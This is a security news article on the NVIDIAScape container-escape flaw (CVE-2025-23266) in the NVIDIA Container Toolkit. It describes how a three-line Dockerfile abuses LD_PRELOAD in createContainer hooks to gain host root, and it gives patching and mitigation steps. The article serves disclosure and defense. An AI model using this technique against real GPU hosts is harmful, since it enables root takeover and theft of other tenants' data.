Researchers Release PoC Exploit for High-Severity NVIDIA AI Toolkit Bug

Researchers Release PoC Exploit for High-Severity NVIDIA AI Toolkit Bug

Wiz Research has disclosed a severe vulnerability in the NVIDIA Container Toolkit (NCT), dubbed #NVIDIAScape and tracked as CVE-2025-23266 with a CVSS score of 9.0, enabling malicious containers to escape isolation and gain root access on host systems.

This flaw, stemming from a misconfiguration in OCI hook handling, affects NCT versions up to 1.17.7 (in CDI mode for pre-1.17.5 releases) and NVIDIA GPU Operator up to 25.3.1.

As a cornerstone for GPU-accelerated AI workloads in cloud environments, the toolkit’s vulnerability poses a systemic risk, potentially allowing attackers to compromise shared infrastructure and access sensitive data across multi-tenant setups.

Critical Container Escape Flaw

The exploit leverages the OCI runtime specification’s createContainer hooks, which NCT employs to configure container access to host NVIDIA drivers and GPUs.

Unlike prestart hooks that operate in isolated contexts, createContainer hooks inherit environment variables from the container image, as defined in the OCI spec occurring post-mount namespace setup but pre-pivot_root.

This inheritance exposes a critical weakness: attackers can manipulate variables like LD_PRELOAD to inject malicious shared objects into the privileged nvidia-ctk process.

With the hook’s working directory set to the container’s root filesystem, a simple path to a payload .so file suffices for execution.

Demonstrating the vulnerability’s simplicity, Wiz released a proof-of-concept (PoC) exploit via a three-line Dockerfile: starting from a Busybox base, it sets LD_PRELOAD to /proc/self/cwd/poc.so and adds the malicious library.

When run with the NVIDIA runtime and GPU flags, the hook loads the payload, granting host root privileges evidenced by a sample PoC that executes ‘id’ and writes output to /owned on the host.

Root on the Host

This mirrors prior container escapes, such as Wiz’s earlier findings in Replicate and DigitalOcean, underscoring recurring flaws in AI supply chain security.

The issue is particularly acute in managed AI services on shared GPU clusters, where untrusted containers could enable data theft or model manipulation across customers.

Initial access vectors include social engineering, supply chain compromises, or arbitrary image loading, bypassing the need for public exposure.

According to the Report, Wiz’s research extends from previous disclosures like CVE-2024-0132, highlighting vulnerabilities in AI stacks from infrastructure like Hugging Face to tools like Ollama.

Patching Guidance for Secure AI Deployments

NVIDIA’s security bulletin urges immediate upgrades to patched NCT versions, with Wiz providing a Threat Intel Center query for identifying vulnerable instances.

Prioritization should focus on hosts running untrusted images, augmented by runtime validation to confirm active toolkit usage.

For unpatchable systems, disable the enable-cuda-compat hook: in legacy NCT mode, edit /etc/nvidia-container-toolkit/config.toml to set features.disable-cuda-compat-lib-hook = true.

For GPU Operator, append disable-cuda-compat-lib-hook to NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES via Helm arguments, or deploy v1.17.8 directly with platform-specific tags like ubuntu20.04 or ubi8.

The disclosure timeline began with Wiz’s report to NVIDIA on May 17, 2025, during Pwn2Own Berlin, culminating in the CVE assignment and bulletin on July 15, 2025, followed by this public release.

This vulnerability reinforces that AI security threats stem more from foundational infrastructure flaws than speculative AI-driven attacks, urging teams to enforce strict controls over model sources and container integrity in rapidly evolving AI pipelines.

Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now


Source link